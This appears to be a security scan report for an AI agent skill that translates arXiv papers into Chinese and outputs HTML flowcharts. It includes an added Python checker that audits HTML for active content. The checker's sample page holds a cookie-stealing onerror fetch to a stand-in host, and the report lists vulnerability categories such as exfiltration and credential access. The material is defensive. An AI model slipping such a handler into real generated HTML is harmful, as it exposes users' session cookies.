arXiv paper interpretation: given an arXiv link, the skill translates the paper into a Chinese interpretation and produces a corresponding flowchart.

Security checks across malware telemetry and agentic risk

Overview

This skill retrieves arXiv paper information, translates it into Chinese, and produces diagram output; it does not persist anything hidden and does not request authority beyond that task.

Install this if you are comfortable with the agent sending arXiv IDs, paper titles, or related search queries to external retrieval services and producing local HTML diagram files. Review generated HTML before sharing or opening it in sensitive contexts, and avoid using private or embargoed research material unless you accept those external lookups.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
Findings (3)

Missing User Warnings (Medium, 93% confidence)

The skill explicitly performs external network access, web scraping, and search-based retrieval, but the user-facing description does not warn that the user's query or requested paper identifiers may be sent to third-party services. This is a transparency and consent problem: user activity, internal prompts, or sensitive research interests can reach external domains without a clear opt-in.

Missing User Warnings (Medium, 95% confidence)

The skill states that it outputs an HTML file but does not warn users that HTML is an active content format: depending on the renderer and viewing environment, a generated file may contain embedded scripts, external references, or unsafe rendering behavior. Delivering HTML without that disclosure raises the risk that users open untrusted output locally or in a browser without appropriate caution.
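The finding above asks users to review generated HTML before opening it. The following is an added example of such a review check, written for this page and not part of the skill's own code: it parses an HTML document with the standard library and reports script tags, inline script bodies, inline event handlers, javascript: URIs, meta refreshes, and references to remote hosts. The sample document is constructed for the demonstration (its hostnames use the reserved .invalid TLD), and the tag and attribute lists are a starting set, not an exhaustive one.

```python
"""Audit generated HTML for active content before opening or sharing it.

Added example, not the skill's own code. SAMPLE_HTML below is constructed for
this demonstration; ACTIVE_TAGS and URL_ATTRS are a reasonable starting set
and are not claimed to be exhaustive.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes that can load a remote resource or run code when the page renders.
URL_ATTRS = {"src", "href", "action", "data", "poster", "formaction", "xlink:href"}
# Tags that execute code, embed other documents, or submit data on their own.
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "form", "applet"}


class ActiveContentAuditor(HTMLParser):
    """Collect everything a reviewer wants to know about before rendering a file."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []        # list of (kind, detail) tuples, in document order
        self._in_script = False   # True while inside a <script> body

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag in ACTIVE_TAGS:
            self.findings.append(("active_tag", tag))
        if tag == "script":
            self._in_script = True
        if tag == "meta" and attrs.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta_refresh", attrs.get("content", "")))
        for name, value in attrs.items():
            value = value.strip()
            if name.startswith("on"):                     # onload, onerror, onclick, ...
                self.findings.append(("event_handler", f"{tag}@{name}"))
            if name in URL_ATTRS:
                scheme = urlparse(value).scheme.lower()
                if scheme == "javascript":
                    self.findings.append(("javascript_uri", f"{tag}@{name}"))
                elif scheme in ("http", "https", "ftp") or value.startswith("//"):
                    self.findings.append(("external_ref", value))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as raw data; record the first 60 chars.
        if self._in_script and data.strip():
            self.findings.append(("inline_script", data.strip()[:60]))


def audit_html(html: str) -> dict:
    """Return findings grouped by kind; an empty dict means nothing active was seen."""
    parser = ActiveContentAuditor()
    parser.feed(html)
    parser.close()
    grouped: dict = {}
    for kind, detail in parser.findings:
        grouped.setdefault(kind, []).append(detail)
    return grouped


def is_safe_to_open(html: str) -> bool:
    """True only when the document has no scripts, handlers, or remote references."""
    return not audit_html(html)


# Constructed sample: a diagram page that pulls a renderer from a CDN, carries a
# tracking pixel with an exfiltrating handler, and a javascript: link.
SAMPLE_HTML = """<!doctype html>
<html><head><meta charset="utf-8"><title>paper flowchart</title>
<script src="https://cdn.example.invalid/mermaid.min.js"></script>
</head><body>
<div class="mermaid">graph TD; A[Input] --> B[Parse]; B --> C[Translate];</div>
<img src="https://tracker.example.invalid/pixel.gif" onerror="fetch('https://x.invalid/?c='+document.cookie)">
<a href="javascript:alert(1)">click</a>
<script>mermaid.initialize({startOnLoad:true});</script>
</body></html>"""

if __name__ == "__main__":
    for kind, details in audit_html(SAMPLE_HTML).items():
        print(f"{kind}: {details}")
    print("safe to open:", is_safe_to_open(SAMPLE_HTML))
```

A clean report from this check does not make a file safe in every viewer (CSS, SVG, and renderer-specific behaviour are out of scope), but any non-empty report is a reason to inspect the file as text, or open it in an isolated browser profile with network access disabled, rather than double-clicking it.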

Natural-Language Policy Violations (Medium, 84% confidence)

Forcing Chinese translation and output without user choice is primarily a product safety and usability issue: it can cause unintended disclosure through translation, degrade fidelity for technical review, and override user expectations about output handling. In security-sensitive or compliance-sensitive contexts, automatic translation may also alter meaning or pass data to additional processing steps without explicit consent.

VirusTotal

64/64 vendors reported this skill as clean.
